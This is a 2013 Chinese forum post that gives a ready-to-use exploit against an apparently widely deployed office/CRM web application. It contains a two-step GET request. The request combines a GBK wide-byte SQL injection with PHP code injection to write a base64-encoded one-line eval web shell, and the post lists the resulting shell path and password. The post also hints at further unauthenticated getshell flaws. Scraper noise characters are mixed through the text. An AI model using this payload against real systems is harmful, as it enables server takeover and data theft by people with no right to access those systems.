此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.$ p+ j4 D* ]2 ]/ o$ P( R- [
4 D$ V+ L. F) m7 J" A
5 n& C$ q( p4 g
EXP:
$ Z; B, d+ R$ m3 T/ {$ }& F8 k 1 g" B) B4 z- u7 }) r! z( y1 y6 h
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}
. x7 {; j8 x& Y5 e 9 z+ ~5 D0 C& [+ \& O
第二步: [GET]http://site/general/email/index.php2 B" j6 w, B; Y3 P: s* K9 `
2 b& }4 Z ~+ x2 `. H1 X; _- N3 l8 @
SHELL: http://site/general/email/shell.php 密码C2 ?5 _; l: f w
+ }1 D: H; V+ e: J' m2 x ( @& \. f- @2 u3 R8 Z5 D
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
8 S! I; j0 [; G% o: C3 F7 u ' C/ _* J- E. i% J% s) A
有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
% j1 M7 s l' f" a4 C: W, H5 |& E. z p0 I1 |$ f3 D& x
- \% U# J5 v8 z; `4 M" ~2 N0 ]0 g
|
发表于 2013-2-4 16:19:29
收藏
支持
反对